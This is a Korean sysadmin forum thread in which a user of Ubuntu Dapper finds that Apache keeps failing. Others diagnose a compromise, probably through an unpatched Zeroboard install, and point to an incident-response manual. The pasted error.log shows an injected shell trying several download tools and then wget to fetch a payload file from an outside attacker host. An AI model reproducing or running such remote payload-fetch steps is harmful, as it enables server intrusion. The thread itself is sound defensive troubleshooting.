몇일 전에 우분투 업데이트를 하고 나니 apache2가 이상합니다.TT

SoftOn의 이미지

ubuntu dapper를 이용해서 서버를 돌리고 있습니다.

지난 주 주말에 업데이트를 하고 나니 2~3일 정도 있으면 홈페이지 접속이 되지 않습니다.

ssh 같은 것은 이상 없이 잘 접속됩니다.

이런 문제를 해결하기 위해서는 무엇을 봐야됩니까?

아님 이전으로 rollback 하는 방법은 없나요?

참고사항 : /var/log/apache2/error.log를 보니 최근에 다음과 같은 log가 반복적으로 남겨져 있습니다;
그리고 batek.txt 파일을 받아서 봤는데 내용이 미심쩍음;;

sh: curl: command not found
rm: cannot remove `borek.txt.*': No such file or directory
sh: lwp-download: command not found
rm: cannot remove `borek.txt.*': No such file or directory
sh: lynx-source: command not found
rm: cannot remove `batek.txt.*': No such file or directory
sh: fetch: command not found
rm: cannot remove `batek.txt.*': No such file or directory
sh: GET: command not found
rm: cannot remove `batek.txt.*': No such file or directory
--19:48:44--  <a href="http://www.adriana.cc/borek.txt
" rel="nofollow">http://www.adriana.cc/borek.txt
</a>           => `borek.txt.1'
Resolving <a href="http://www.adriana.cc" rel="nofollow">www.adriana.cc</a>... 216.40.34.100
Connecting to <a href="http://www.adriana.cc" rel="nofollow">www.adriana.cc</a>|216.40.34.100|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39,915 (39K) [text/plain]
 
    0K .......... .......... .......... ........             100%   58.51 KB/s
 
19:48:45 (58.51 KB/s) - `borek.txt.1' saved [39915/39915]
lacovnk의 이미지

아파치 서버에 저런 로그가 남아있다는 말씀입니까?

아파치에서 sh를 이용해 명령어를 실행시킬 일이 없을 텐데.. 해킹 아닌가요? :(

SoftOn의 이미지

글에 적은 것처럼 /var/log/apache2/error.log 에 있던 내용입니다

해킹 당했다고 생각될때 뭐뭐 확인해야 된다는 메뉴얼 없나요? 찾아봐도 적당한 문서가 안 보입니다TT

오늘 또 당했나 보네요;;

리붓하면 정상 동작하길래 apache만 restart 시켜 볼라고 했지만 다음과 같이 리붓이 되지 않습니다TT

softon@juno:/var/www$ sudo /etc/init.d/apache2 restart
Password:
 * Forcing reload of web server  (Apache2)...                                   (98)Address already in use: make_sock: could not bind to address [::]:80
no listening sockets available, shutting down
Unable to open logs
                                                                        [fail]

사랑천사의 이미지

혹시 Perl로 돌아 가는 CGI같은게 있으면 한번 보시고 다른쪽 로그도 한번 보세요. 보시고 허튼 접속이 있으면 그걸 통해서 뭔가 유입 되엇을 지도 모르죠... 권한 설정에서.. 물론 /etc/httpd/conf/httpd.conf 등의. 아파치 설정 파일에서지만.. ExecCGI가 있으며 제거 해 보시고요. 뭐 ... Perl로 돌아 가는 CGI같은게 있다면 그렇게 하면 그걸 쓰실 수는 없으시겠지만 아무튼... 지금 중요한건 Perl 같습니다. CGI... 그리고 저런 명령들이 실행 된다는건 뭔가.. 해킹이 흐흠.. (물론 아닐 수도 있습니다.) 뭐 여러가지 문제들로 인해서 저는 배포판에 따라오는 아파치 같은건 안 쓰는 편입니다 솔직히 흐흠.
----
일어나라! 싸워라! 그리고 이겨라!
다만!!! 의미 있는 것에 그 힘을!!!
그 능력과 노력을!!!

사람천사

SoftOn의 이미지

cgi는 처음부터 사용 금지 되어 있습니다..

가장 개연성 있는 것이 제로보드의 취약점을 공격한 것 같습니다.

재작년 이전에 설치하고 패치를 한적이 없는 듯 하네요;;

제로보드 사용자에게 패치하라고 하고 몇일간 또 저런 상황이 발생하나 두고 봐야겠습니다TT

mirr의 이미지

아파치에서 사용하는 포트를 사용중이라 재실행시킬 수 없다는 메시지입니다.
로그파일마져도 이미 점거당해있는상태이고, 아파치 웹데몬도 문제가 생긴거 같네요...
해킹당했을때의 사후처리법 메뉴얼 있습니다.
다만 백프로 포맷을 권유한다는게 문제죠 ㅡ,.ㅡ::

내 마음속의 악마가 자꾸만 나를 부추겨.
늘 해왔던 것에 만족하지 말고 뭔가 불가능해 보이는 것을 하라고 말야.

내 마음속의 악마가 자꾸만 나를 부추겨.
늘 해왔던 것에 만족하지 말고 뭔가 불가능해 보이는 것을 하라고 말야.

SoftOn의 이미지

사후처리 메뉴얼 어디서 구할 수 있나요?

lacovnk의 이미지

기억에 정보보호진흥원 홈페이지에 자료가 있던 것 같습니다.

SoftOn의 이미지

http://www.cyberprivacy.or.kr/

통합자료실 - 세미나 자료실에 '해킹.바이러스 대응요령'라는 제목으로 되어 있습니다.

댓글 달기

Filtered HTML

  • 텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>
  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

BBCode

  • 텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param>
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

Textile

  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • You can use Textile markup to format text.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Markdown

  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • Quick Tips:
    • Two or more spaces at a line's end = Line break
    • Double returns = Paragraph
    • *Single asterisks* or _single underscores_ = Emphasis
    • **Double** or __double__ = Strong
    • This is [a link](http://the.link.example.com "The optional title text")
    For complete details on the Markdown syntax, see the Markdown documentation and Markdown Extra documentation for tables, footnotes, and more.
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Plain text

  • HTML 태그를 사용할 수 없습니다.
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
  • 줄과 단락은 자동으로 분리됩니다.
댓글 첨부 파일
이 댓글에 이미지나 파일을 업로드 합니다.
파일 크기는 8 MB보다 작아야 합니다.
허용할 파일 형식: txt pdf doc xls gif jpg jpeg mp3 png rar zip.
CAPTCHA
이것은 자동으로 스팸을 올리는 것을 막기 위해서 제공됩니다.